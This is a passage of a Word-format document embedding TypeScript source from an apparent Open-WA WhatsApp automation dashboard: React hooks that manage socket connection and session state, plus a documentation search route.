        <w:t xml:space="preserve">        setSession((prev)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uptime: Math.floor((Date.now() - startTimeRef.current)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if (uptimeRef.current) clearInterval(uptimeRef.current)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mounted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init()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client = await getClient()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (!mounted)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Fetch initial session data using SocketClient's Proxy methods</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const [hostNumber, waVersion, battery, connectionState] = await Promise.allSettled([</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          client.ask("getHostNumber" as any, {}),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          client.ask("getWAVersion" as any, {}),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          client.ask("getBatteryLevel" as any, {}),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          client.ask("getConnectionState" as any,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(!mounted)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setSession((prev)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connected: true,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          hostNumber: hostNumber.status === "fulfilled" ? (hostNumber.value as string) : null,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          waVersion: waVersion.status === "fulfilled" ? (waVersion.value as string) : null,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          battery: battery.status === "fulfilled" ? (battery.value as number) : null,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          connectionState:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            connectionState.status === "fulfilled" ? (connectionState.value as string)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startTimeRef.current = Date.now()</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Listen for session events via EventEmitter2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        client.ev.on("qr", (data: unknown) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          if (!mounted) return</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          const qrData = data as { qr?: string } | string</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          setQr(typeof qrData === "string" ? qrData : qrData?.qr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client.ev.on("session:state", (data: unknown) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          if (!mounted) return</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          const state = data as Partial&lt;SessionState&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          setSession((prev) =&gt; ({ ...prev, ...state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client.socket.on("disconnect", () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          if (!mounted) return</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          setSession((prev) =&gt; ({ ...prev, connected: false, connectionState: "DISCONNECTED"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client.socket.on("connect", () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          if (!mounted) return</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          setSession((prev) =&gt; ({ ...prev, connected: true }))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          // Re-fetch on reconnect</w:t>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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (mounted) setSession(INITIAL_STATE)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if (mounted) setLoading(false)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init()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Uptime counter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    uptimeRef.current = setInterval(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      if (!mounted) return</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      setSession((prev) =&gt; ({</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        ...prev,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        uptime: prev.connected ? Math.floor((Date.now() - startTimeRef.current) / 1000)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mounted = false</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      if (uptimeRef.current) clearInterval(uptimeRef.current)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session, qr, loading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apps/dashboard-neo/src/lib/hooks/use-session.ts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apps/dashboard-neo/src/lib/hooks/use-socket.ts ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { useState, useEffect, useCallback, useRef } from "react"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { getClient, getClientSync, getApiUrl, type SocketClient, type Client } from "@/lib/api-client"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { useDemo } from "@/lib/demo/use-demo"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { resolveDemoAsk } from "@/lib/demo/demo-data"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ConnectedClient = SocketClient &amp;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function useSocket() {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  const { isDemo } = useDemo()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  const [connected, setConnected] = useState(isDemo)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  const [error, setError] = useState&lt;string | null&gt;(null)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  const clientRef = useRef&lt;ConnectedClient | null&gt;(isDemo ? null : getClientSync())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 Only run on client</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (typeof window === "undefined") return</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    // Demo mode — no real socket needed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (isDemo) return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mounted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connect()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targetUrl = getApiUrl()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        console.groupCollapsed(`[Dashboard] Initializing API Connection`)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        console.info(`Target URL: ${targetUrl}`)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        console.groupEnd()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client = await getClient()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (!mounted) return</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        clientRef.current = client</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        setConnected(client.socket.connected)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        setError(null)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client.socket.on("connect", () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          console.info(`[Dashboard] Successfully connected to API server at ${targetUrl}`)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          if (mounted) setConnected(true)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client.socket.on("disconnect", (reason: string) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          console.warn(`[Dashboard] Disconnected from API server: ${reason}`)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          if (mounted) setConnected(false)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client.socket.on("connect_error", (err: Error &amp; { req?: any, code?: string }) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          console.error(`[Dashboard] API Connection Error to ${targetUrl}:`, {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            message: err.message,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            name: err.name,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            code: err.code,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            req: err.req ? 'present' : 'none',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            hint: `Ensure the Open-WA API server is running on ${targetUrl} and socketMode is enabled.`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(mounted) setError(err.message)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console.error(`[Dashboard] Failed to initialize API client:`, err)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (mounted) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          setError(err instanceof Error ? err.message : "Connection failed")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          setConnected(false)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connect()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 =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      mounted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[isDemo])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Call any Client method via the socket (or mock in demo mode).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ask = useCallback(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    async &lt;T = unknown&gt;(method: string, args?: Record&lt;string, unknown&gt; | unknown[]): Promise&lt;T&gt; =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      if (isDemo) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        // Simulate a small network delay for realism</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        await new Promise((r) =&gt; setTimeout(r, 80 + Math.random() * 120))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        return resolveDemoAsk(method, args) as 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client = clientRef.current</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      if (!client) throw new Error("Not connected")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      return client.ask(method as any, args as any) as Promise&lt;T&gt;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[isDemo],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connected,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    error,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    ask,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    client: clientRef.current,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apps/dashboard-neo/src/lib/hooks/use-socket.ts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apps/docs/src/routes/api/search.ts ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { createFileRoute } from '@tanstack/react-router';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { source } from '@/lib/source';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { createFromSource } from 'fumadocs-core/search/server';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server = createFromSource(source, {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    // https://docs.orama.com/docs/orama-js/supported-languages</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    language: 'english',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Route = createFileRoute('/api/search')({</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    server: {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        handlers: {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            GET: () =&gt; server.staticGET(),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apps/docs/src/routes/api/search.ts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apps/docs/src/routes/docs/$.tsx ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { createFileRoute, notFound } from '@tanstack/react-router';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { DocsLayout } from 'fumadocs-ui/layouts/docs';</w:t>
